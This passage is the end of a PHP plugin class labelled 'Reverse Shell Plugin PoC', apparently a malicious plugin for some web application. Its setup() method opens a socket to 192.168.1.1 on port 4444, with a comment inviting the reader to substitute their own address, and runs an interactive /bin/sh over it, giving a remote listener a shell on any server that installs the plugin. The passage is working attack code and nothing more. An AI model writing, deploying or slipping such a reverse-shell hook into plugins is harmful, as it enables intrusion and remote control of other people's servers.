_pluginDescription = "Reverse Shell Plugin PoC"; } public function setup() { $sock=fsockopen('192.168.1.1',4444); //change the ip and the port for your machine $pr=proc_open('/bin/sh -i <&3 >&3 2>&3',array(3=>$sock),$pipes); proc_close($pr); } } ?>